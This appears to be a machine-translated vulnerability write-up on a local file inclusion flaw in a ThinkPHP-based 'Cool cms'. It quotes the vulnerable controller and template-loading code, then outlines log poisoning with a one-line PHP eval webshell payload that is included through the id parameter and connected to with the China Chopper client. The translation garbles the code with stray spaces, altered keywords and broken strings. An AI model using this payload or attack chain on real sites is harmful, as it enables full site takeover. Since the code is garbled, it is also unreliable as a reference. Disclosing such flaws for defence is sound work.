Cool cms local inclusion causes getwebshell (ThinkPHP)

You can directly control the permissions of the entire website through local inclusion of getwebshell. Vulnerability file: core \ Lib \ Action \ Home \ MyAction. class. php

<? Phpclass MyAction extends HomeAction {public function index () {$ this-> show ();} public function show () {$ id =! Empty ($ _ GET ['id'])? $ _ GET ['id']: 'hot '; $ this-> display ('My _'. trim ($ id); vulnerability }}?>

 

Includes:

Public function fetch ($ templateFile = '', $ charset ='', $ contentType = 'text/html ', $ display = false) {$ GLOBALS ['_ viewStartTime'] = microtime (TRUE); if (null = $ templateFile) // return directly using the null parameter as the template name without any output return; if (empty ($ charset) $ charset = C ('default _ charset'); // webpage character encoding header ("Content-Type :". $ contentType. "; charset = ". $ charset); header ("Cache-control: private"); // supports page bounce // page Cache ob_start (); ob_implicit_flu Sh (0); if (! File_exists_case ($ templateFile) // automatically locates the Template File $ templateFile = $ this-> parseTemplateFile ($ templateFile); // key functions are only used to process files containing templates, let me take a look at this function. $ Engine = strtolower (C ('tmpl _ ENGINE_TYPE '); if ('php' = $ engine) {// The template array variables are decomposed into independent variables extract ($ this-> tVar, EXTR_OVERWRITE); // directly load the PHP template include $ templateFile ;} elseif ('think' ===$ engine & $ this-> checkCache ($ templateFile )) {// If the Think template engine is used and the cache effectively breaks down variables and loads the template cache extract ($ this-> tVar, EXTR_OVERWRITE ); // load the template CACHE file include C ('cache _ path '). md5 ($ templateFile ). C ('tmpl _ CACHFILE_SUFFIX ');} else {// The Template file needs to be re-compiled to support third-party Template engines // call the Template engine for parsing and outputting $ className = 'template '. ucwords ($ engine); require_cache (THINK_PATH. '/Lib/Think/Util/Template /'. $ className. '. class. php '); $ tpl = new $ className; $ tpl-> fetch ($ templateFile, $ this-> tVar, $ charset);} $ this-> templateFile = $ templateFile; // get and clear the cache $ content = ob_get_clean (); // Replace the template content with $ content = $ this-> templateContentReplace ($ content ); // layout template parsing $ content = $ this-> layout ($ content, $ charset, $ contentType); // output template file return $ this-> output ($ content, $ display );}

 

Processing of included files:

Private function parseTemplateFile ($ templateFile) {if (''= $ templateFile) {// If the template file name is empty, locate $ templateFile = C ('tmpl _ FILE_NAME ') according to the default rules;} elseif (strpos ($ templateFile ,'@')) {// The operation template for introducing other themes must contain the module name, for example, blue @ User: add $ templateFile = TMPL_PATH.str_replace (array ('@',':'),'/', $ templateFile ). C ('tmpl _ TEMPLATE_SUFFIX ');} elseif (strpos ($ templateFile,': ') {// introduce the operation template of other modules $ templateFile = TEMPLATE_PATH. '/'. str_r Eplace (':', '/', $ templateFile). C ('tmpl _ TEMPLATE_SUFFIX ');} elseif (! Is_file ($ templateFile) {// introduce other operation templates of the current module $ templateFile = dirname (C ('tmpl _ FILE_NAME ')). '/'. $ templateFile. C ('tmpl _ TEMPLATE_SUFFIX ');} if (! File_exists_case ($ templateFile) throw_exception (L ('_ TEMPLATE_NOT_EXIST _'). '['. $ templateFile. ']'); return $ templateFile ;}

 

With the inclusion point, we need a file containing our malicious code. We use thinphp's error logging function: manufacturing error: Log File: Use the two features mentioned above: 1. include any file 2. error writing date 3. combine thinkphp template syntax to construct a sentence :{~ Eval ($ _ POST [x])} writes a sentence: manufacturing error: Log File: contains a sentence: Kitchen Knife link:


Solution:For program repair problems, the template parameters should not be controllable from the perspective of secondary developers. For thinkphp, the processing of template file names and paths must be improved.